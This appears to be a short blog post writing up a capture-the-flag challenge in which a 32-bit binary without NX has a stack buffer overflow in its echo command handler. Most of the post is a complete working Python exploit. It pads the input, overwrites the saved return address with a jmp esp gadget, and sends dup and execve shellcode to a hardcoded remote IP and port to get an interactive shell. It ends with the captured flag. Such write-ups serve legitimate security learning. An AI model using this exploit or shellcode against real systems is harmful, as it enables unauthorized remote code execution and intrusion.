Exploitation 1 was a 32 bit ELF without NX protection. The vulnerability is a buffer overflow in stack using echo command during sprintf() call at 0x080489BF. snprintf() copies 8191 bytes of data supplied by read() into 0x78 byte buffer causing the overflow. Suppling 122 bytes along with echo: [6 bytes] will overwrite the saved EIP. Also there is a nice jmp esp gadget to bypass ASLR. Below is the exploit
#!/usr/bin/env python import socket import telnetlib import struct ip = "127.0.0.1" ip = "54.163.248.69" port = 9000 dup = '31c031db31c9b103fec9b03fb304cd8075f6'.decode('hex') execve = '31c9f7e151682f2f7368682f62696e89e3b00bcd80'.decode('hex') shellcode = dup + execve soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.connect((ip, port)) soc.recv(16) jmp_esp = 0x080488b0 payload = "echo " payload += "A" * 118 payload += struct.pack("<I", jmp_esp) payload += shellcode soc.send(payload + chr(0xa)) print "[*] Shell" s = telnetlib.Telnet() s.sock = soc s.interact()Flag for the challenge is aleph1-to-the-rescue++
No comments:
Post a Comment